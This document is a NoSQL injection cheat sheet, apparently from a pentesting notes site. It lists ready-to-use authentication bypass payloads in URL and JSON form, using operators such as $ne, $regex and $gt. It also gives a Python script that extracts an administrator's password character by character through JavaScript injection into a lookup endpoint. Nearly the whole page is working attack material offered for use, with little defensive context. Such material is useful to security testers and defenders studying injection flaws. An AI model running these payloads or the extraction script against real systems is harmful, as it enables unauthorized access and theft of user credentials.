NoSQL injection
NoSQL injection is a vulnerability where an attacker is able to interfere with the queries that an application makes to a NoSQL database. NoSQL injection may enable an attacker to:
Bypass authentication or protection mechanisms.
Extract or edit data.
Cause a denial of service.
Execute code on the server.
Auth bypass
#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }Regex to bypass
{
"username":{
"$regex":"^admi*"
},
"password":{
"$ne":"^.*"
}
}Exfiltrate password using regex script
import requests
# Base URL for the target
base_url = "https://tareget.com/user/lookup"
# Session cookie (modify this with your actual session cookie)
cookies = {
'session': 'COOKIE_HERE',
}
# Characters to test (extend this as needed)
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
# Starting point for the password
password = ""
# Function to test a given prefix
def test_prefix(prefix):
injection = f"?user=administrator'+%26%26+this.password+%26%26+this.password.match(/^{prefix}.*$/)%00"
params = {'user': injection}
inject = base_url + injection
response = requests.get(inject, cookies=cookies)
return "administrator" in response.text
# Iteratively build the password
while True:
found_char = False
for char in characters:
test_pass = password + char
if test_prefix(test_pass):
password += char
print(f"Found character: {char} -> Current password: {password}")
found_char = True
break
if not found_char:
print("Password extraction complete!")
break
print(f"The password is: {password}")
Last updated